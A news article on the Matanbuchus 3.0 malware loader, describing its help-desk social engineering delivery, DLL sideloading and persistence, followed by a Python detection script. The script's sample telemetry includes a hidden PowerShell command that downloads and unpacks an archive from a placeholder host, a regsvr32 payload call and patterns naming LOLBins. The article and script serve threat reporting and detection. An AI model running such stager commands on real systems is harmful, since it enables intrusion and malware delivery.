
Cybersecurity researchers have flagged a new variant of a known malware loader called Matanbuchus that packs in features designed to enhance its stealth and evade detection.
Matanbuchus is the name of a malware-as-a-service (MaaS) offering that can act as a conduit for next-stage payloads such as Cobalt Strike beacons and ransomware.
First advertised on a Russian-speaking cybercrime forum in February 2021 for a rental price of $2,500, the malware has been used in ClickFix-style lures that trick visitors to legitimate-but-compromised sites into running malicious commands.
Matanbuchus stands out among loaders because it is not usually spread through spam email or drive-by downloads. Instead, it is typically deployed through hands-on social engineering in which attackers directly trick users. In some cases it supports the kind of initial access that brokers sell on to ransomware groups. This makes it more targeted and tailored than a typical commodity loader.
The latest version of the loader, tracked as Matanbuchus 3.0, incorporates several new features, including improved communication protocols, in-memory capabilities, enhanced obfuscation methods, CMD and PowerShell reverse shell support, and the ability to run next-stage DLL, EXE, and shellcode payloads, Morphisec said.

The cybersecurity company said it observed the malware in an incident earlier this month, in which an external Microsoft Teams call impersonating an IT help desk targeted employees to launch Quick Assist for remote access and run a PowerShell script that deployed Matanbuchus.
It is worth noting that similar social engineering tactics have been adopted by threat actors associated with the Black Basta ransomware operation.
"The victims are carefully targeted and persuaded to run a script that triggers the download of an archive," says Morphisec CTO Michael Gorelik. "This archive contains a renamed Notepad++ updater (GUP), a slightly modified configuration XML file, and a malicious sideloaded DLL representing the Matanbuchus loader."
Matanbuchus 3.0 is available for a monthly price of $10,000 for the HTTPS version and $15,000 for the DNS version.

Once launched, the malware collects system information and enumerates the list of running processes to determine whether security tools are present. It also checks its own process status to see if it is running with administrative privileges.
It then sends the collected details to a command-and-control (C2) server to receive additional payloads in the form of an MSI installer or a portable executable. Persistence is achieved by setting up a scheduled task.

"It sounds simple, but the Matanbuchus developers have implemented advanced techniques for scheduling tasks through the use of COM and shellcode injection," explained Gorelik. "The shellcode itself is interesting. It implements relatively basic API resolution (simple string comparison) and sophisticated COM execution that operates on ITaskService."
The loader is equipped with features that can be invoked remotely by the C2 server, allowing it to collect a list of all running processes, running services, and installed applications.
"The Matanbuchus 3.0 malware-as-a-service has evolved into a sophisticated threat," says Gorelik. "This updated version introduces advanced techniques such as communication protocols, in-memory stealth, enhanced obfuscation, WQL queries, and CMD and PowerShell reverse shell support."
"The loader's ability to handle regsvr32, rundll32, msiexec, or process hollowing commands highlights its versatility, resulting in a major risk to compromised systems."
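The chain described above (a PowerShell download launched from a Quick Assist session, a renamed updater sideloading a DLL, scheduled-task persistence registered through COM, and regsvr32/rundll32/msiexec execution of the next stage) maps onto a handful of telemetry checks. The following is an added example for this article, not code from Morphisec or from the loader: field names follow Sysmon and Windows Security Event 4698 conventions, but the rule names, the REMOTE_ASSIST process list, the update-folder path, file names, URL and every sample record are constructed assumptions for illustration.

```python
"""Detection logic for the Matanbuchus 3.0 delivery chain described above.

Added example for this article, not code from Morphisec or the loader itself.
Records mimic Sysmon event fields (Image, ParentImage, CommandLine, ImageLoaded)
and Security Event 4698 (scheduled task creation), but every record below is
constructed for illustration, not captured telemetry.
"""
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
LOLBINS = {"regsvr32.exe", "rundll32.exe", "msiexec.exe"}
# Assumption: image names of processes that front a help-desk-style remote session
REMOTE_ASSIST = {"quickassist.exe", "ms-teams.exe", "teams.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOWNLOAD_RE = re.compile(r"(?i)invoke-webrequest|iwr\b|downloadstring|downloadfile|expand-archive")
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def name(path: str) -> str:
    """Lower-cased file name of a Windows path (works for bare command names too)."""
    return PureWindowsPath(path).name.lower()


def user_writable(path: str) -> bool:
    """True if the path (or command line) points into a user-writable location."""
    return any(marker in path.lower() for marker in USER_WRITABLE)


def task_command(task_xml: str) -> str:
    """Extract the Exec/Command of an Event 4698 TaskContent document ('' if none)."""
    root = ET.fromstring(task_xml)
    node = root.find(".//t:Exec/t:Command", TASK_NS)
    return (node.text or "") if node is not None else ""


def check_event(ev: dict) -> list:
    """Return the rule names that fire for one event (empty list means no finding)."""
    hits = []
    kind = ev["kind"]
    if kind == "process":
        img, parent, cmd = name(ev["Image"]), name(ev["ParentImage"]), ev.get("CommandLine", "")
        # Step 1: a shell under a remote-assistance process that fetches or unpacks content
        if img in SHELLS and parent in REMOTE_ASSIST and DOWNLOAD_RE.search(cmd):
            hits.append("shell_download_under_remote_assist")
        # Step 4: a LOLBin handed a payload that lives in a user-writable directory
        if img in LOLBINS and user_writable(cmd):
            hits.append("lolbin_user_writable_payload")
    elif kind == "imageload":
        # Step 2: DLL sideload, a host binary in a user-writable folder loads an unsigned
        # DLL from the same folder (the renamed Notepad++ updater case in the article)
        host, dll = ev["Image"], ev["ImageLoaded"]
        same_dir = PureWindowsPath(host).parent == PureWindowsPath(dll).parent
        if user_writable(host) and same_dir and not ev.get("Signed", True):
            hits.append("unsigned_dll_sideload_user_writable")
    elif kind == "taskcreate":
        # Step 3: scheduled-task persistence; registration via COM/ITaskService still lands
        # in Event 4698, so inspect the task's Exec command rather than the registering tool
        cmd = task_command(ev["TaskContent"])
        if user_writable(cmd) or name(cmd) in LOLBINS:
            hits.append("scheduled_task_user_writable_or_lolbin")
    return hits


def scan(events: list) -> dict:
    """Map each event id to the rules it triggered, keeping only events with hits."""
    findings = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            findings[ev["id"]] = hits
    return findings


# Constructed sample telemetry: a benign system-initiated MSI install, then the chain.
SAMPLE_EVENTS = [
    {"id": 1, "kind": "process", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r'msiexec.exe /i "C:\Windows\Installer\1a2b.msi" /qn'},
    {"id": 2, "kind": "process",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\WindowsApps\QuickAssist\QuickAssist.exe",
     "CommandLine": "powershell -nop -w hidden -c \"iwr https://example.invalid/a.zip "
                    "-OutFile $env:TEMP\\a.zip; Expand-Archive $env:TEMP\\a.zip $env:APPDATA\\upd\""},
    {"id": 3, "kind": "imageload", "Image": r"C:\Users\alice\AppData\Roaming\upd\updater.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\upd\helper.dll", "Signed": False},
    {"id": 4, "kind": "taskcreate", "TaskContent": (
        '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><Actions>'
        r'<Exec><Command>C:\Users\alice\AppData\Roaming\upd\updater.exe</Command></Exec>'
        '</Actions></Task>')},
    {"id": 5, "kind": "process", "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Users\alice\AppData\Roaming\upd\updater.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\alice\AppData\Roaming\upd\stage2.dll"},
]

if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS).items():
        print(event_id, rules)
```

Each rule keys on the one property the loader cannot easily change (a payload living in a user-writable path, an unsigned DLL beside its host, a task whose action points there) rather than on file names, which are trivially renamed. The benign msiexec record in the sample shows the path check doing the work: the same LOLBin launched by services.exe against C:\Windows\Installer produces no finding.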
As malware-as-a-service evolves, Matanbuchus 3.0 fits the broader trend of stealth-first loaders that rely on LOLBins (living-off-the-land binaries), COM object hijacking, and PowerShell stagers to stay under the radar.
Threat researchers are increasingly mapping these loaders as part of their attack surface management strategies and linking them to the abuse of enterprise collaboration tools such as Microsoft Teams and Zoom.